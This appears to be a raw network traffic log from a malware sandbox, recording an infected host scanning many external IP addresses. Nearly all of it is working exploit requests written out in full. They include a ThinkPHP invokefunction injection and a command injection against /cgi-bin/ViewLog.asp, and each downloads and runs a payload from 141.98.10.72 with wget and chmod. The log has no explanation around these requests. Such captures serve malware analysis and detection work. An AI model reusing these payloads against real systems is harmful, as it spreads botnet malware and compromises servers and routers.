Feb 14, 2024 09:30:08.906174898 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:09.214154005 CET	497	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 303 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 67 72 6f 77 77 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at growwus.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
528	192.168.2.15	44188	112.85.242.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:08.929549932 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:09.259994984 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
Feb 14, 2024 09:30:09.310348988 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
Feb 14, 2024 09:30:09.415363073 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
Feb 14, 2024 09:30:09.516334057 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
529	192.168.2.15	44960	85.122.224.207	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.268399000 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
530	192.168.2.15	51082	85.90.5.19	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.268460989 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:09.480079889 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:08 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
531	192.168.2.15	44192	112.85.242.201	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.286324978 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:09.644438982 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
Feb 14, 2024 09:30:09.694477081 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
Feb 14, 2024 09:30:09.799422979 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
Feb 14, 2024 09:30:09.911447048 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>
Feb 14, 2024 09:30:10.015438080 CET	287	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:09 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.19.8</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
532	192.168.2.15	53018	94.122.120.87	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.295490980 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
533	192.168.2.15	34504	85.140.46.72	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.296159983 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
534	192.168.2.15	53516	94.123.141.255	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.296789885 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
535	192.168.2.15	50844	94.123.31.206	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.298470974 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
536	192.168.2.15	35190	31.200.35.50	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.298683882 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
537	192.168.2.15	57200	31.41.198.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.341007948 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:09.661058903 CET	111	IN	HTTP/1.1 404 Not Found Connection: close Content-Type: text/plain Transfer-Encoding: chunked

Session ID	Source IP	Source Port	Destination IP	Destination Port
538	192.168.2.15	48474	94.122.61.233	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.791021109 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
539	192.168.2.15	55184	94.120.154.153	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.791450024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
540	192.168.2.15	34562	85.140.46.72	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.792490005 CET	380	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Server: httpd Date: Wed, 14 Feb 2024 11:30:09 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
541	192.168.2.15	49376	95.170.92.20	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.848135948 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:10.053066969 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:09 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
542	192.168.2.15	38158	95.101.203.250	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:09.850044012 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
